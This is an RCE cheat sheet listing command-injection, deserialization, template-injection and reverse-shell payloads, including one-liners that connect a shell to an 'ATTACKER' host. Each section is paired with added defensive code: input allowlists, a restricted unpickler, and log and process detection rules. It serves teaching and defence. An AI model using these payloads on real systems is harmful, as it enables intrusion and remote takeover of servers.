🧠 Description

RCE vulnerabilities allow an attacker to execute arbitrary commands on the server that hosts a vulnerable application. This is the most critical vulnerability class, because a single working payload usually means complete compromise of the host.

Common RCE Vectors:
  • OS Command Injection: shell metacharacters in user input
  • Code Injection: eval() with user-controlled input
  • Deserialization: insecure deserialization of user data
  • Template Injection: SSTI in template engines

🖥️ OS Command Injection

# Linux
; whoami
| whoami
`whoami`
$(whoami)

# Windows
; whoami
& whoami
| whoami

# Chaining commands
; cat /etc/passwd | grep root

# Blind RCE (time-based)
; sleep 5
& ping -c 5 127.0.0.1
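Added example (not from the original cheatsheet): the vulnerable pattern that makes every payload above work, its hardened form, and a detection check for request logs. `host`, the function names and the `ping` use case are assumptions chosen for illustration.

```python
import re
import subprocess
from typing import List

# Allowlist for a "host" parameter: DNS labels or an IPv4 literal, nothing else.
# Anchored fullmatch, so a trailing "; whoami" or "$(whoami)" can never pass.
_HOST_RE = re.compile(
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)

# The metacharacters used in the payload list above. This is a detection signal for
# logging/alerting, not a sanitiser: the fix is to avoid the shell, not to strip characters.
_SHELL_META_RE = re.compile(r"[;&|`$<>\n]")


def vulnerable_command(host: str) -> str:
    """Anti-pattern: untrusted input concatenated into a string destined for shell=True."""
    return f"ping -c 1 {host}"


def safe_ping_argv(host: str) -> List[str]:
    """Hardened form: validate against the allowlist, then build an argv list."""
    if len(host) > 253 or not _HOST_RE.fullmatch(host):
        raise ValueError(f"host rejected by allowlist: {host!r}")
    # A list with shell=False goes straight to execve(); ';', '|', '`' and '$()' are
    # just bytes inside one argument and are never interpreted by anything.
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> subprocess.CompletedProcess:
    """Execute the validated command without a shell."""
    return subprocess.run(safe_ping_argv(host), capture_output=True, text=True, timeout=10, check=False)


def looks_like_command_injection(value: str) -> bool:
    """Detection check for request parameters or WAF logs: any shell metacharacter present."""
    return _SHELL_META_RE.search(value) is not None


def is_rejected(host: str) -> bool:
    """True when the hardened path refuses the value."""
    try:
        safe_ping_argv(host)
    except ValueError:
        return True
    return False
```

The allowlist also refuses values starting with `-`, which closes the related option-injection case even when no shell is involved.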

📦 Deserialization Attacks

# PHP unserialize
O:5:"user":1:{s:4:"name";s:6:"hacker";}

# Java serialized
# Use ysoserial to generate payload
java -jar ysoserial.jar CommonsCollections6 "whoami" > payload.ser

# Python pickle
import pickle
pickle.loads(b"cos\nsystem\n(S'whoami'\ntR.")

# .NET deserialization
# Use ysoserial.net
.\ysoserial.exe -f BinaryFormatter -o base64 -c "whoami"
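Added example (not from the original cheatsheet) showing why the pickle payload above works and how a restricted unpickler stops it: every GLOBAL opcode is resolved through `find_class`, so an allowlist there refuses `os.system` before anything runs. The `User` class and function names are assumptions for illustration; the malicious blob is a constructed copy of the page's payload.

```python
import io
import pickle


class User:
    """A benign application class that legitimately travels through pickle."""

    def __init__(self, name: str):
        self.name = name


# Constructed payload in the same shape as the protocol-0 pickle above:
# 'c' (GLOBAL) resolves os.system, then 'R' (REDUCE) would call it with 'whoami'.
MALICIOUS_PICKLE = b"cos\nsystem\n(S'whoami'\ntR."

# The only globals an unpickler may resolve, mapped directly to the object so no
# import happens at load time. Anything else (os.system, subprocess.Popen, ...) is refused.
ALLOWED_GLOBALS = {(User.__module__, User.__qualname__): User}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module: str, name: str):
        try:
            return ALLOWED_GLOBALS[(module, name)]
        except KeyError:
            raise pickle.UnpicklingError(f"global {module}.{name} is forbidden") from None


def restricted_loads(data: bytes):
    """Drop-in for pickle.loads that only materialises allowlisted classes."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def serialize_user(name: str) -> bytes:
    """Produce a legitimate pickle for the round-trip check."""
    return pickle.dumps(User(name))


def loaded_user_name(data: bytes) -> str:
    return restricted_loads(data).name


def is_rejected(data: bytes) -> bool:
    """True when the restricted unpickler refuses the blob without executing anything."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return True
    return False
```

The restricted unpickler is a mitigating control; the primary fix is not to accept pickle (or `unserialize`, `ObjectInputStream`, `BinaryFormatter`) from untrusted sources at all and to use a schema-validated format such as JSON. Where the native format cannot be dropped, the same allowlist idea exists elsewhere: PHP's `unserialize($data, ['allowed_classes' => false])` and Java's `ObjectInputFilter` (JEP 290).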

📝 Server-Side Template Injection

# Jinja2 (Python)
{{7*7}}
{{config}}
{{''.__class__.__mro__[1].__subclasses__()}}

# Twig (PHP)
{{7*7}}
{{_self.class.getTraits()}}

# Freemarker (Java)
${7*7}
<#assign ex = "freemarker.template.utility.Execute"?new()>${ex("whoami")}

# Handlebars (JS)
{{7*7}}
{{#with "a"}}{{#with (exec "whoami")}}{{this}}{{/with}}{{/with}}
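Added example (not from the original cheatsheet): detection of the probe payloads above in access-log request lines, next to the rendering pattern that makes SSTI impossible, keeping the template fixed and passing untrusted values in as data. Python's stdlib `string.Template` stands in for a real engine here; in Jinja2 the same rule is a constant template string with user values passed to `render()`, with `SandboxedEnvironment` as defense in depth. The sample request lines are constructed; the indicator names and function names are assumptions.

```python
import re
from string import Template
from urllib.parse import parse_qs, unquote, urlsplit

# Indicator patterns derived from the probe payloads above. They are a detection aid for
# log review or WAF alerting, not a sanitiser: the fix is never compiling user input as
# template source.
SSTI_INDICATORS = {
    "mustache_expr": re.compile(r"\{\{.+?\}\}", re.S),                # Jinja2 / Twig / Handlebars
    "dollar_expr": re.compile(r"\$\{.+?\}", re.S),                    # Freemarker ${...}
    "freemarker_directive": re.compile(r"<#\s*(assign|list|if|import)\b", re.I),
    "python_dunder": re.compile(r"__(class|mro|subclasses|globals|builtins|import)__"),
    "handlebars_block": re.compile(r"\{\{#\s*with\b", re.I),
}


def ssti_probe_indicators(value: str) -> list:
    """Names of indicator patterns matching the value (decoded once more to catch double-encoding)."""
    decoded = unquote(value)
    return [name for name, rx in SSTI_INDICATORS.items() if rx.search(decoded)]


def scan_request_line(request_line: str) -> dict:
    """Map each query parameter of an access-log request line to the indicators it triggers."""
    target = request_line.split(" ")[1]  # "GET /path?x=y HTTP/1.1" -> "/path?x=y"
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    findings = {}
    for name, values in params.items():
        hits = sorted({ind for v in values for ind in ssti_probe_indicators(v)})
        if hits:
            findings[name] = hits
    return findings


# Constructed request lines, as they would appear in a web server access log.
SAMPLE_REQUEST_LINES = [
    "GET /search?q=hello HTTP/1.1",
    "GET /profile?name=%7B%7B7*7%7D%7D HTTP/1.1",
    "GET /render?tpl=%3C%23assign+x%3D1%3E HTTP/1.1",
    "GET /profile?name=%7B%7B%27%27.__class__.__mro__%7D%7D HTTP/1.1",
]


def flag_requests(lines) -> list:
    """(line, findings) for every request line carrying at least one indicator."""
    flagged = []
    for line in lines:
        findings = scan_request_line(line)
        if findings:
            flagged.append((line, findings))
    return flagged


# Safe rendering: the template is a constant; user values are substituted as data and are
# never parsed as template syntax, so "{{7*7}}" comes out literally as "{{7*7}}".
GREETING = Template("Hello, $name! Your query was: $query")


def render_greeting(name: str, query: str) -> str:
    return GREETING.safe_substitute(name=name, query=query)
```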

🐚 Reverse Shells

# Bash
bash -i >& /dev/tcp/ATTACKER/443 0>&1

# Python
python -c 'import socket,os,pty;s=socket.socket();s.connect(("ATTACKER",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

# PHP
php -r '$sock=fsockopen("ATTACKER",443);exec("/bin/bash -i <&3 >&3 2>&3");'

# Perl
perl -e 'use Socket;$i="ATTACKER";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");'

# Netcat
nc -e /bin/bash ATTACKER 443
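Added example (not from the original cheatsheet): detection logic for the reverse-shell one-liners above, run over process-execution telemetry. It combines payload-shaped signatures with a behavioural rule that needs no signature at all: a web server service account spawning a shell or interpreter. The event format, the `203.0.113.5` address (a documentation range standing in for ATTACKER) and the function names are constructed assumptions.

```python
import re
from typing import Dict, List, Tuple

# Signatures drawn from the payloads above: a shell redirected onto /dev/tcp, netcat with -e,
# and interpreter one-liners that dup a socket onto stdin/stdout/stderr.
REVERSE_SHELL_PATTERNS = {
    "bash_dev_tcp": re.compile(r"/dev/tcp/"),
    "netcat_exec": re.compile(r"\bnc\b.*\s-e\s"),
    "python_socket_dup": re.compile(r"\bpython[0-9.]*\s+-c\s.*(socket\.socket|os\.dup2|pty\.spawn)"),
    "php_socket_exec": re.compile(r"\bphp\s+-r\s.*fsockopen.*exec\("),
    "perl_socket_exec": re.compile(r"\bperl\s+-e\s.*socket\(.*exec\("),
}

WEB_SERVER_USERS = {"www-data", "apache", "nginx", "httpd"}
INTERPRETERS_AND_SHELLS = {"sh", "bash", "dash", "zsh", "nc", "ncat", "python", "python3", "perl", "php"}


def classify_exec(event: Dict[str, object]) -> List[str]:
    """Return the detection names that fire for one process-exec event."""
    cmdline = str(event["cmdline"])
    hits = [name for name, rx in REVERSE_SHELL_PATTERNS.items() if rx.search(cmdline)]
    # Behavioural rule, independent of payload syntax: the account that runs the web
    # application has no business launching a shell or scripting interpreter.
    binary = cmdline.split()[0].rsplit("/", 1)[-1]
    if event["user"] in WEB_SERVER_USERS and binary in INTERPRETERS_AND_SHELLS:
        hits.append("webserver_user_spawned_shell")
    return hits


# Constructed exec events in the shape an EDR or auditd exec collector would deliver.
SAMPLE_EVENTS = [
    {"pid": 1201, "user": "www-data", "parent": "apache2", "cmdline": "/usr/sbin/apache2 -k start"},
    {"pid": 1345, "user": "www-data", "parent": "apache2", "cmdline": "bash -i >& /dev/tcp/203.0.113.5/443 0>&1"},
    {"pid": 1402, "user": "www-data", "parent": "sh", "cmdline": "nc -e /bin/bash 203.0.113.5 443"},
    {"pid": 1500, "user": "deploy", "parent": "sshd", "cmdline": "python3 manage.py migrate"},
    {"pid": 1533, "user": "www-data", "parent": "sh",
     "cmdline": "python -c 'import socket,os,pty;s=socket.socket();s.connect((\"203.0.113.5\",443));"
                "os.dup2(s.fileno(),0);pty.spawn(\"/bin/bash\")'"},
    {"pid": 1600, "user": "root", "parent": "systemd", "cmdline": "bash -c 'systemctl restart nginx'"},
]


def flag_events(events) -> List[Tuple[int, List[str]]]:
    """(pid, detections) for every event that triggered at least one rule."""
    flagged = []
    for event in events:
        hits = classify_exec(event)
        if hits:
            flagged.append((int(event["pid"]), hits))
    return flagged
```

Egress filtering from the web tier complements this: the payloads above all need an outbound TCP connection to ATTACKER, so a default-deny outbound policy on application hosts turns a successful RCE into a much noisier, shorter-lived event.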